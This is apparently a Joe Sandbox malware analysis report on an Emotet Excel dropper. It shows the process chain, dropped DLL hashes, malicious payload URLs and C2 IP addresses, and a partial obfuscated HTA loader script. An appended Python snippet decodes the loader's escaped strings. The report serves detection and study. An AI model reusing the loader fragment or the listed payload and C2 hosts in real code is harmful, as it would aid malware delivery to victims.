                            Source: Yara match - File source: 9.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                            Source: Yara match - File source: 13.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
                            Source: Yara match - File source: 10.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
                            Source: Yara match - File source: 0000000F.00000002.679498941.0000000002E40000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match - File source: 0000000D.00000002.620421483.0000000002651000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match - File source: 0000000F.00000002.679023916.00000000004B1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match - File source: 0000000D.00000002.620926031.00000000030E0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match - File source: 0000000E.00000002.623757227.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
                            Source: Yara match - File source: 0000000D.00000002.619911631.0000000000221000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match - File source: 0000000D.00000002.620976859.0000000003111000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match - File source: 0000000D.00000002.620028804.0000000000391000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match - File source: 0000000F.00000002.679099785.0000000000971000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match - File source: 0000000F.00000002.679434577.00000000029E1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match - File source: 0000000A.00000002.561150759.0000000002130000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match - File source: 0000000F.00000002.679378273.0000000002920000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match - File source: 0000000A.00000002.561065386.00000000004A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match - File source: 0000000F.00000002.684161589.0000000010001000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY
                            Source: Yara match - File source: 0000000A.00000002.561626313.0000000003110000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match - File source: 0000000A.00000002.561662235.0000000003181000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match - File source: 0000000A.00000002.561110360.0000000002101000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match - File source: 0000000A.00000002.560982656.0000000000371000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match - File source: 0000000D.00000002.620781732.0000000002910000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match - File source: 0000000C.00000002.563589206.00000000001B1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match - File source: 0000000E.00000002.623291568.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match - File source: 0000000A.00000002.561451631.0000000002871000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match - File source: 0000000A.00000002.561377294.0000000002410000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match - File source: 0000000D.00000002.620753571.00000000028E1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match - File source: 0000000C.00000002.563561570.0000000000180000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match - File source: 0000000E.00000002.623338464.0000000000301000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match - File source: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
                            Source: Yara match - File source: 0000000C.00000002.563850517.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
                            Source: Yara match - File source: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.561295967.00000000023A1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.679539755.0000000002E71000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.678957905.00000000003F1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.620558528.00000000027B1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.620134635.00000000004B0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.560945911.0000000000340000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.561541228.0000000002E11000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.561700746.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.619872548.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.679306140.0000000002791000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.679166369.0000000000A00000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.561513666.0000000002DE0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.678995791.0000000000480000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.678823543.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.561271615.0000000002370000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000009.00000002.504836959.0000000000250000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.621014524.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.620852430.0000000002ED1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.620492443.0000000002730000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.679074321.0000000000940000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.619980737.0000000000360000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.561230347.00000000022F1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.620621291.0000000002870000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: C:\ProgramData\JooSee.dll, type: DROPPED
MITRE ATT&CK Matrix (techniques listed per tactic, top to bottom; the numbers shown in front of a technique are kept as they appear in the original matrix)

Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
Execution: 21 Scripting; 1 Native API; 13 Exploitation for Client Execution; 11 Command and Scripting Interpreter; 1 Service Execution; 1 PowerShell; Scheduled Task; Command and Scripting Interpreter; PowerShell
Persistence: 1 Windows Service; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job; At (Linux)
Privilege Escalation: 1 Windows Service; 11 Process Injection; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job; At (Linux)
Defense Evasion: 1 Disable or Modify Tools; 1 Deobfuscate/Decode Files or Information; 21 Scripting; 2 Obfuscated Files or Information; 2 Masquerading; 1 Virtualization/Sandbox Evasion; 11 Process Injection; 1 Hidden Files and Directories; 1 Rundll32
Credential Access: 1 Input Capture; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
Discovery: 2 System Time Discovery; 3 File and Directory Discovery; 38 System Information Discovery; 21 Security Software Discovery; 1 Virtualization/Sandbox Evasion; 1 Process Discovery; 1 Application Window Discovery; 1 Remote System Discovery; System Network Connections Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Shared Webroot; Software Deployment Tools
Collection: 1 Archive Collected Data; 1 Email Collection; 1 Input Capture; 1 Clipboard Data; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
Command and Control: 13 Ingress Tool Transfer; 1 Encrypted Channel; 2 Non-Application Layer Protocol; 122 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points; Downgrade to Insecure Protocols; Rogue Cellular Base Station
Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
Impact: Modify System Partition; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact; Generate Fraudulent Advertising Revenue; Data Destruction
Behavior Graph (ID: 562418, Sample: CJ68000754184.xls, Startdate: 28/01/2022, Architecture: WINDOWS, Score: 100)

Network: 129.232.188.93 xneeloZA South Africa; 162.214.50.39 UNIFIEDLAYER-AS-1US United States; 43 other IPs or domains
Signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Multi AV Scanner detection for domain / URL; Found malware configuration; 16 other signatures

Process tree:
EXCEL.EXE 53 12 (started)
  dropped: C:\Users\user\Desktop\CJ68000754184.xls, Composite
  cmd.exe (started)
    mshta.exe 11 (started)
      network: 91.240.118.172, 49167, 49168, 80 GLOBALLAYERNL unknown
      powershell.exe 12 7 (started)
        network: hostfeeling.com 164.90.147.135, 80 DIGITALOCEAN-ASNUS United States
        network: jurnalpjf.lan.go.id 103.206.244.105, 49170, 80 CEPATNET-AS-IDPTMoraTelematikaIndonesiaID Indonesia
        dropped: C:\ProgramData\JooSee.dll, PE32
        signature: Powershell drops PE file
        cmd.exe (started)
          rundll32.exe (started)
            rundll32.exe 1 (started)
              dropped: C:\Windows\...\wpnzacwyitgbmx.rxn (copy), PE32
              signature: Hides that the sample has been downloaded from the Internet (zone.identifier)
              rundll32.exe (started)
                rundll32.exe 1 (started)
                  signature: Hides that the sample has been downloaded from the Internet (zone.identifier)
                  rundll32.exe (started)

Source | Detection | Scanner | Label | Link
CJ68000754184.xls | 13% | Virustotal | | Browse
CJ68000754184.xls | 19% | ReversingLabs | Document-Excel.Trojan.Emotet |

Source | Detection | Scanner | Label | Link
C:\ProgramData\JooSee.dll | 100% | Joe Sandbox ML | |
Source | Detection | Scanner | Label | Link
hostfeeling.com | 11% | Virustotal | | Browse
jurnalpjf.lan.go.id | 1% | Virustotal | | Browse
Name | IP | Active | Malicious | Antivirus Detection | Reputation
hostfeeling.com | 164.90.147.135 | true | true | | unknown
jurnalpjf.lan.go.id | 103.206.244.105 | true | false | | unknown
Name | Malicious | Antivirus Detection | Reputation
http://91.240.118.172/gg/ff/fe.png | true | Avira URL Cloud: malware | unknown
http://jurnalpjf.lan.go.id/assets/iM/ | true | Avira URL Cloud: malware | unknown
http://91.240.118.172/gg/ff/fe.html | true | Avira URL Cloud: malware | unknown
                            • Avira URL Cloud: malware
                            unknown
                            https://property-eg.com/mlzkir/97v/PE3powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            unknown
                            http://daisy.sukoburu-secure.com/8plks/v8lyZTe/powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            unknown
                            https://property-eg.com/mlzkir/9powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            unknown
                            http://91.240.118.172powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.684983623.000000000362E000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: safe
                            unknown
                            http://91.240.118.172/gg/ff/fe.htmllmshta.exe, 00000004.00000002.446063365.00000000039DB000.00000004.00000020.00020000.00000000.sdmptrue
                            • Avira URL Cloud: safe
                            unknown
                            http://jurnalpjf.lan.go.idpowershell.exe, 00000006.00000002.685196853.00000000037CA000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://www.protware.commshta.exe, 00000004.00000003.420738023.0000000003A2C000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://www.protware.comPmshta.exe, 00000004.00000003.420287820.0000000003A31000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://activetraining.sytes.net/libraries/8s/PE3powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            unknown
                            http://91.240.118.172/gg/ff/fe.htmlfunctionmshta.exe, 00000004.00000003.423260829.00000000032DD000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: safe
                            unknown
                            http://totalplaytuxtla.com/sitiopowershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://maxtdeveloper.com/okw9yx/Gc28ZX/powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            unknown
                            http://it-o.biz/bitrix/xoDdDe/powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            unknown
                            http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervpowershell.exe, 00000006.00000002.677562211.00000000002AE000.00000004.00000020.00020000.00000000.sdmpfalse
                              high
                              https://gudangtasorichina.com/wp-content/GG01c/powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              unknown
                              http://totalplaytuxtla.com/sitio/DgktL3zd/powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              unknown
                              http://activetraining.sytes.net/libraries/8s/powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              unknown
                              http://91.240.118.172/gg/ff/fe.ppowershell.exe, 00000006.00000002.684983623.000000000362E000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://gardeningfilm.com/wp-contpowershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              unknown
                              http://jurnalpjf.lan.go.id/assets/iM/PE3powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              unknown
                              http://91.240.118.172/gg/ff/fe.htmlBCJ68000754184.xls.0.drtrue
                                unknown
                                http://www.piriform.com/ccleanerpowershell.exe, 00000006.00000002.677562211.00000000002AE000.00000004.00000020.00020000.00000000.sdmpfalse
                                  high
                                  http://www.protware.com/rmshta.exe, 00000004.00000003.441588224.0000000003A9D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.446294886.0000000003A9D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.420167396.0000000003A9D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.443804667.0000000003A9D000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://bimesarayenovin.ir/wp-admin/G1pYGL/PE3powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmptrue
                                  • Avira URL Cloud: malware
                                  unknown
                                  http://bimesarayenovin.ir/wp-admin/G1pYGL/powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmptrue
                                  • Avira URL Cloud: malware
                                  unknown
                                  http://daisy.sukoburu-secure.com/8plks/v8lyZTe/PE3powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmptrue
                                  • Avira URL Cloud: malware
                                  unknown
                                  http://www.piriform.com/ccleanerhttp://wpowershell.exe, 00000006.00000002.677314579.0000000000260000.00000004.00000020.00020000.00000000.sdmpfalse
                                    high
IP | Domain | Country | ASN | ASN Name | Malicious
195.154.133.20 | unknown | France | 12876 | OnlineSASFR | true
185.157.82.211 | unknown | Poland | 42927 | S-NET-ASPL | true
212.237.17.99 | unknown | Italy | 31034 | ARUBA-ASNIT | true
79.172.212.216 | unknown | Hungary | 61998 | SZERVERPLEXHU | true
110.232.117.186 | unknown | Australia | 56038 | RACKCORP-APRackCorpAU | true
173.214.173.220 | unknown | United States | 19318 | IS-AS-1US | true
212.24.98.99 | unknown | Lithuania | 62282 | RACKRAYUABRakrejusLT | true
138.185.72.26 | unknown | Brazil | 264343 | EmpasoftLtdaMeBR | true
178.63.25.185 | unknown | Germany | 24940 | HETZNER-ASDE | true
160.16.102.168 | unknown | Japan | 9370 | SAKURA-BSAKURAInternetIncJP | true
81.0.236.90 | unknown | Czech Republic | 15685 | CASABLANCA-ASInternetCollocationProviderCZ | true
103.75.201.2 | unknown | Thailand | 133496 | CDNPLUSCOLTD-AS-APCDNPLUSCOLTDTH | true
216.158.226.206 | unknown | United States | 19318 | IS-AS-1US | true
45.118.115.99 | unknown | Indonesia | 131717 | IDNIC-CIFO-AS-IDPTCitraJelajahInformatikaID | true
51.15.4.22 | unknown | France | 12876 | OnlineSASFR | true
159.89.230.105 | unknown | United States | 14061 | DIGITALOCEAN-ASNUS | true
162.214.50.39 | unknown | United States | 46606 | UNIFIEDLAYER-AS-1US | true
103.206.244.105 | jurnalpjf.lan.go.id | Indonesia | 131111 | CEPATNET-AS-IDPTMoraTelematikaIndonesiaID | false
200.17.134.35 | unknown | Brazil | 1916 | AssociacaoRedeNacionaldeEnsinoePesquisaBR | true
217.182.143.207 | unknown | France | 16276 | OVHFR | true
107.182.225.142 | unknown | United States | 32780 | HOSTINGSERVICES-INCUS | true
51.38.71.0 | unknown | France | 16276 | OVHFR | true
45.118.135.203 | unknown | Japan | 63949 | LINODE-APLinodeLLCUS | true
50.116.54.215 | unknown | United States | 63949 | LINODE-APLinodeLLCUS | true
131.100.24.231 | unknown | Brazil | 61635 | GOPLEXTELECOMUNICACOESEINTERNETLTDA-MEBR | true
46.55.222.11 | unknown | Bulgaria | 34841 | BALCHIKNETBG | true
41.76.108.46 | unknown | South Africa | 327979 | DIAMATRIXZA | true
173.212.193.249 | unknown | Germany | 51167 | CONTABODE | true
45.176.232.124 | unknown | Colombia | 267869 | CABLEYTELECOMUNICACIONESDECOLOMBIASASCABLETELCO | true
178.79.147.66 | unknown | United Kingdom | 63949 | LINODE-APLinodeLLCUS | true
212.237.5.209 | unknown | Italy | 31034 | ARUBA-ASNIT | true
162.243.175.63 | unknown | United States | 14061 | DIGITALOCEAN-ASNUS | true
176.104.106.96 | unknown | Serbia | 198371 | NINETRS | true
207.38.84.195 | unknown | United States | 30083 | AS-30083-GO-DADDY-COM-LLCUS | true
164.68.99.3 | unknown | Germany | 51167 | CONTABODE | true
164.90.147.135 | hostfeeling.com | United States | 14061 | DIGITALOCEAN-ASNUS | true
192.254.71.210 | unknown | United States | 64235 | BIGBRAINUS | true
212.237.56.116 | unknown | Italy | 31034 | ARUBA-ASNIT | true
104.168.155.129 | unknown | United States | 54290 | HOSTWINDSUS | true
45.142.114.231 | unknown | Germany | 44066 | DE-FIRSTCOLOwwwfirst-colonetDE | true
203.114.109.124 | unknown | Thailand | 131293 | TOT-LLI-AS-APTOTPublicCompanyLimitedTH | true
209.59.138.75 | unknown | United States | 32244 | LIQUIDWEBUS | true
159.8.59.82 | unknown | United States | 36351 | SOFTLAYERUS | true
129.232.188.93 | unknown | South Africa | 37153 | xneeloZA | true
91.240.118.172 | unknown | unknown | 49453 | GLOBALLAYERNL | true
58.227.42.236 | unknown | Korea Republic of | 9318 | SKB-ASSKBroadbandCoLtdKR | true
158.69.222.101 | unknown | Canada | 16276 | OVHFR | true
104.251.214.46 | unknown | United States | 54540 | INCERO-HVVCUS | true
                                    Joe Sandbox Version:34.0.0 Boulder Opal
                                    Analysis ID:562418
                                    Start date:28.01.2022
                                    Start time:21:17:27
                                    Joe Sandbox Product:CloudBasic
                                    Overall analysis duration:0h 12m 8s
                                    Hypervisor based Inspection enabled:false
                                    Report type:light
                                    Sample file name:CJ68000754184.xls
                                    Cookbook file name:defaultwindowsofficecookbook.jbs
                                    Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed:16
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • HDC enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Detection:MAL
                                    Classification:mal100.troj.expl.evad.winXLS@21/9@2/48
                                    EGA Information:
                                    • Successful, ratio: 75%
                                    HDC Information:
                                    • Successful, ratio: 18.4% (good quality ratio 15.8%)
                                    • Quality average: 66.5%
                                    • Quality standard deviation: 32.2%
                                    HCA Information:
                                    • Successful, ratio: 100%
                                    • Number of executed functions: 0
                                    • Number of non-executed functions: 0
                                    Cookbook Comments:
                                    • Adjust boot time
                                    • Enable AMSI
                                    • Found application associated with file extension: .xls
                                    • Changed system and user locale, location and keyboard layout to English - United States
                                    • Found Word or Excel or PowerPoint or XPS Viewer
                                    • Attach to Office via COM
                                    • Scroll down
                                    • Close Viewer
                                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe
                                    • TCP Packets have been reduced to 100
                                    • Execution Graph export aborted for target mshta.exe, PID 2812 because there are no executed function
                                    • Execution Graph export aborted for target powershell.exe, PID 2408 because it is empty
• Not all processes were analyzed, report is missing behavior information
                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                    • Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
21:18:22 | API Interceptor | 61x Sleep call for process: mshta.exe modified
21:18:25 | API Interceptor | 442x Sleep call for process: powershell.exe modified
21:19:08 | API Interceptor | 70x Sleep call for process: rundll32.exe modified
No context
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                    Category:dropped
                                    Size (bytes):548864
                                    Entropy (8bit):6.980517956334168
                                    Encrypted:false
                                    SSDEEP:12288:B2AavzUBPSczbeeTLjvWyMwWd3DYr6i64/:OUBPSczbeeTnvqZDWA
                                    MD5:74D1C2A27C684005BDFCE89A1A5618B4
                                    SHA1:033C28F6D209BA26560E472FEA70DDF740435EA0
                                    SHA-256:34347D89E1A340EDC48F050CDDD15CB1E3B1702932887AEA3D97D0D0BFFE4DE8
                                    SHA-512:E0A9010A2AAB912D48672F0DBD30E65664CAE4DA12B4E5444FB5AD8262E4099FFD08E15113871B3EA76EFA07F2F307319ACD699CE49F83CDF2C7734EBDE360A2
                                    Malicious:true
                                    Yara Hits:
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: C:\ProgramData\JooSee.dll, Author: Joe Security
                                    Antivirus:
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......hs.a,..2,..2,..2...2&..2...27..2,..2...2...26..2...2...2...2...2...2-..2...2-..2...2-..2Rich,..2................PE..L...>..a...........!.....P...................`......................................................................@-..R...4...........PV......................0N......................................@............`..........@....................text...9E.......P.................. ..`.rdata.......`.......`..............@..@.data....e...0...0...0..............@....rsrc...PV.......`...`..............@..@.reloc..b...........................@..B........................................................................................................................................................................................................................................................................................................................
                                    Process:C:\Windows\System32\mshta.exe
                                    File Type:data
                                    Category:downloaded
                                    Size (bytes):11054
                                    Entropy (8bit):6.200485074224619
                                    Encrypted:false
                                    SSDEEP:192:aY5CkQ90FfYdjqQa2XdytMHsygv2nscEYD63lWAG7orUzAaENQaCBlm1Zhvkz29c:aY4kBBOjqQrXdHHsyg8sCr0UznQQasYS
                                    MD5:DD20B97330028BCB6BF98D97C47028D9
                                    SHA1:D58D97589A97FBD3B1216ED76C4918113F4B7B25
                                    SHA-256:4E945D89F45065FBA3B3318DD8CB3EFF9991CB6F8038168D221B862810E84D21
                                    SHA-512:AF4979B61257330E763B0C450575859D678F6950EF42783C87B2D9ED84130E4651CF58FBEF40E4C0BD3217B957A807337475F85C2610C24317C05DE98AC31A88
                                    Malicious:false
                                    IE Cache URL:http://91.240.118.172/gg/ff/fe.html
                                    Preview:.......................................................................................................................................................................<html><head><meta http-equiv='x-ua-compatible' content='EmulateIE9'><script>l1l=document.documentMode||document.all;var f9f76c=true;ll1=document.layers;lll=window.sidebar;f9f76c=(!(l1l&&ll1)&&!(!l1l&&!ll1&&!lll));l_ll=location+'';l11=navigator.userAgent.toLowerCase();function lI1(l1I){return l11.indexOf(l1I)>0?true:false};lII=lI1('kht')|lI1('per');f9f76c|=lII;zLP=location.protocol+'0FD';mY2KcI8HWQPA8=new Array();q52Li668M68pR=new Array();q52Li668M68pR[0]='%6D\170%38%38%33%34%34%41' ;mY2KcI8HWQPA8[0]='.<.!.D.O.C.T.Y.P.E. .h.t.m.l. .P.U.B.L.I.C. .".-././.W.3.C~..D.T.D. .X.H.T.M.L. .1...0. .T.r.a.n.s.i.t.i.o.n.a.l~..E.N."~.~\n.t.p.:~..w~B...w.3...o.r.g./.T.R./.x~\n~..1./~..D~N~P.l.1.-.t~-~/~1~3~5.l...d.t.d.".>.<~W. .x~.~/.=."~=~?~A~C~E~G~I./.1.9~y~V~..l~f~h.e.a.d~g.s.c.r.i.p.t.>.e.v~6.(.u.n.e}..a.p.e.(.\'}..\\.1.6.2.%.2.0}
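The HTA fetched from http://91.240.118.172/gg/ff/fe.html builds its payload from arrays of escaped string literals, and the garbled "e.v~6.(.u.n.e}..a.p.e.(" fragment in the preview suggests they are fed through eval(unescape(...)). The Python below is an added example, not code from the Joe Sandbox report or from the malware: it resolves the JavaScript literal escapes (\ooo octal, \xXX, \uXXXX) first and the percent-encoding second, in the order the script engine applies them, and runs on the one literal that is legible in the preview, q52Li668M68pR[0]. The sample string is copied from the preview; what the decoded value is used for is not visible on this page.

```python
import re

# Constructed input: the one literal that is legible in the HTA preview above
# (the JS variable q52Li668M68pR[0]); everything else in the preview is
# truncated or mangled, so only this string is decoded here.
SAMPLE_LITERAL = r"%6D\170%38%38%33%34%34%41"

# Escapes a JavaScript string literal resolves when it is parsed:
# \xXX, \uXXXX and legacy \ooo octal.  \x and \u are tried before the
# octal branch so that "\x25" is not misread as "\x" followed by digits.
_JS_LITERAL_ESCAPE = re.compile(
    r"\\x([0-9A-Fa-f]{2})|\\u([0-9A-Fa-f]{4})|\\([0-7]{1,3})"
)

# Escapes the legacy unescape() function resolves: %uXXXX and %XX.
_UNESCAPE = re.compile(r"%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})")


def decode_js_literal(s: str) -> str:
    """Apply JavaScript string-literal escape resolution (\\xXX, \\uXXXX, \\ooo)."""
    def repl(m: re.Match) -> str:
        hx, uni, octal = m.groups()
        if hx is not None:
            return chr(int(hx, 16))
        if uni is not None:
            return chr(int(uni, 16))
        return chr(int(octal, 8))
    return _JS_LITERAL_ESCAPE.sub(repl, s)


def js_unescape(s: str) -> str:
    """Mimic the JavaScript unescape() function (%uXXXX and %XX)."""
    def repl(m: re.Match) -> str:
        uni, hx = m.groups()
        return chr(int(uni if uni is not None else hx, 16))
    return _UNESCAPE.sub(repl, s)


def decode_hta_literal(s: str) -> str:
    """Decode a literal the way eval(unescape('...')) would see it: the parser
    resolves backslash escapes first, then unescape() removes percent-encoding.
    A single combined pass would mis-handle inputs such as \\x2541, which must
    become "%41" before it becomes "A"."""
    return js_unescape(decode_js_literal(s))


# Single-quoted JS literal, allowing backslash-escaped characters inside it.
_QUOTED_LITERAL = re.compile(r"'((?:[^'\\]|\\.)*)'")


def extract_literals(script: str) -> list[str]:
    """Pull every single-quoted literal out of a script fragment, keeping the
    raw (still escaped) text so decode_hta_literal() can process it."""
    return _QUOTED_LITERAL.findall(script)


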